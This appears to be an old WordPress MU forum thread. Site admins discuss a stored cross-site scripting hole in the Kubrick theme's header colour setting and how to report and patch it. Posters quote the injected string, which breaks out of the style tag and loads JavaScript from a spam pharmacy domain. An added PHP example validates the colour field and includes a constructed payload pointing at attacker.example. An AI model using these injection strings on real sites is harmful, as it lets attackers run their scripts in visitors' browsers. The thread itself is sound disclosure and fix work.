redbox
Member
Posted 17 years ago
I clicked on a new blog on my site and was surprised to see the "requested account deleted" message as if it had been deleted or marked as spam. The background was black and the text was red. I checked the account and it was neither deleted nor marked as spam. I viewed the page source and could see the regular page text, which included a lot of keywords for prescriptions, though no links. I finally figured out that they were using Kubrick and had entered a JavaScript link in the Kubrick header selector:
header-img.php?upper=\"}--></style><script src=http://1.onlinesearch4meds.com/ap/levitra.js></script><style>&lower=4180b6
I would imagine something like this could cause some damage. Is there a way to prevent it?
Best bet would be to probably submit an email to security ( at ) wordpress ( dot ) org as Kubrick is a theme that they keep an eye on.
I'm lost though. Where exactly in Kubrick was it put in? Into header.php or something on the user side?
redbox
Member
Posted 17 years ago
It was entered where you customize the Kubrick header color from the user's admin panel. Go to Presentation... Customize Header... then click Advanced.
They deleted the color hex code and entered \"}--></style><script src=http://1.onlinesearch4meds.com/ap/levitra.js></script><style> in that field to produce the code I posted above.
Email security ASAP and mention it's showing up on the WPMU version of Kubrick. Sounds like the code is not going through the special characters and kses functions. It's got to be an oversight.
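An added example (not Kubrick's or WordPress's own code) of the check the previous post is asking for: the two header colour values are validated against a strict six-hex-digit allowlist before they are interpolated into the inline style block, so a value shaped like the one posted above is dropped rather than escaped. The function names, the CSS rule and the payload are constructed for this illustration.

```php
<?php
// Added illustration, not the theme's own code. Function names, the CSS
// rule and the sample payload below are constructed for this example.

/**
 * Return a validated 6-digit hex colour, or null when the value is not one.
 * Anything that is not exactly six hex digits (quotes, braces, '--', '>',
 * tags) is rejected outright instead of being escaped.
 */
function kubrick_header_color( $value ) {
    $value = ltrim( (string) $value, '#' );
    return preg_match( '/^[0-9a-fA-F]{6}$/', $value ) ? strtolower( $value ) : null;
}

/**
 * Build the inline <style> block so that only allowlisted values are ever
 * interpolated; a rejected value falls back to the theme default colour.
 */
function kubrick_header_style( $upper, $lower, $default = '69aee7' ) {
    $upper = kubrick_header_color( $upper ) ?? $default;
    $lower = kubrick_header_color( $lower ) ?? $default;
    return "<style type=\"text/css\">\n"
         . "#header { background-color: #{$upper}; border-color: #{$lower}; }\n"
         . "</style>\n";
}

// Constructed payload with the same shape as the one reported in the thread:
// it closes the CSS rule and the </style> tag, then opens a <script> tag.
$payload = '\\"}--></style><script src=http://attacker.example/x.js></script><style>';

// The vulnerable pattern the thread describes: raw interpolation of the field.
$vulnerable = "<style>#header { background-color: #{$payload}; }</style>";

// The hardened pattern: the payload fails the allowlist and the default is used.
$hardened = kubrick_header_style( $payload, '4180b6' );

var_dump( strpos( $vulnerable, '<script' ) !== false );
var_dump( strpos( $hardened, '<script' ) !== false );
echo $hardened;
```

Because the field is a colour and nothing else, a reject-on-mismatch allowlist is the right shape of fix here; running the value through an HTML escaper would still let a malformed colour reach the stylesheet.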
redbox
Member
Posted 17 years ago
Thanks. I emailed and they sent me an updated file to try, but it didn't filter out the code. Hopefully someone will be able to correct it.
Thanks :)
lunabyte
Member
Posted 17 years ago
For now, it seems like the simplest fix would be to use another theme as the default, and turn off themes with the same header feature.
Copy the text from the URL below, rename it functions.php and upload it to /public_html/wp-content/themes/default/
It'll remove the option entirely; however, it won't fix any existing breaches... if someone can provide instructions on that, that'd be great.
Here's the file: http://incsub.org/functions.txt
I don't believe any themes that I've worked with have the same feature... Anyone got any examples?
Update: Site Admin > Blogs > Edit Blog (will most likely be your bottom option) and deleting the Kubrick header image code should sort out individual blogs.
I think K2 also does this.
I was able to reproduce this in the "Home" theme but after copying over files from the default theme the problem was fixed. See http://trac.mu.wordpress.org/changeset/977 for the fixed version of functions.php
Thanks Donncha.
So when do we get to see some more pictures of Adam?